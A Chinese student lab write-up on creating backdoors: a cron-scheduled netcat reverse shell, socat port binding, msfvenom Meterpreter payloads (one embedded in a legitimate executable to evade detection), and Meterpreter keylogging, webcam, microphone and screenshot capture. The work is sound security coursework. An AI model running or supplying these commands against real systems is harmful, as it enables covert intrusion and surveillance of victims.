标签:反向 感受 get tty 进制 编辑 模块 类型 linu
在非正规网站下载盗版软件,后门隐藏在盗版软件中。
受到诱骗点击某些可执行文件(表面上是压缩包,实际上是双击自动解压执行)
5205
端口cron
命令启动crontab -e
指令编辑一条定时任务(crontab
指令增加一条定时任务,-e
表示编辑,3
表示选择编辑器)5 * * * * nc 192.168.211.1 1221 -e /bin/sh
意思是,每个小时的第5分钟反向连接Windows主机的1221端口tcp-listen:1221 exec:cmd.exe,pty,stderr
,这个命令会把cmd.exe绑定到端口1221,同时把cmd的stderr重定向到stdout上。Win+L
锁定计算机,再打开后可以发现之前创建的任务已经开始运行了socat - tcp:192.168.211.1:1221
指令连接Win10主机,getshell使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.137 LPORT=1221 -f exe > 20181221.exe
指令生成后门。
ncat -lv 1221 > 20181221.exe
指令将被控制主机进入接受文件模式nc 192.168.211.1 1221 < 20181221.exe
将后门传输过去msfconsole
指令进入msf控制台输入use exploit/multi/handler使用监听模块,设置payload
输入set payload windows/meterpreter/reverse_tcp 设置载荷,基于TCP的反向连接反弹windows shell
输入 set LHOST 192.168.211.137 设置本主机IP
输入 set LPORT 1221 设置本主机端口
输入exploit,等待启动后门程序
record_mic
指令可以截获一段音频使用webcam_snap
指令可以使用摄像头进行拍照,效果如下
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录screenshot
指令可以进行截屏通过查找网上资料发现有这样一条指令:
msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
在参数说明中提到,-p
使用的为有效载荷,由于我们是在x86下的linux系统,所以要改为linux/x86/meterpreter/reverse_tcp
。
-x
是可执行文件模板,shellcode会写入这个可执行文件中,我们这里用到的是pwn1,所以改为pwn1
LHOST、LPORT
是ip地址和端口,我们把它改为192.168.211.137
和1221
-f
是生成文件的类型,我们把它改为二进制可执行文件elf
所以最后的payload就是msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.211.137 LPORT=1221 -x pwn1 -f elf > 20181221pwn
生成完payload之后,我们运行MSF(具体指令参考上一过程),再运行我们生成的20181221pwn文件,就可以getshell了
解决:关闭杀毒软件,将后门文件设为信任文件。
解决:通过chmod +x 20181221pwn
命令修改文件权限,从而可运行
? 通过本次实验我懂得了后门的原理,学会了如何制作后门和使用后门,并且学会了MSF的使用。这次实验使我深刻感受到杀毒软件的必要性和网络安全的重要性,要时刻防范后门的植入。
标签:反向 感受 get tty 进制 编辑 模块 类型 linu
原文地址:https://www.cnblogs.com/MisakaYuii-Z/p/14588771.html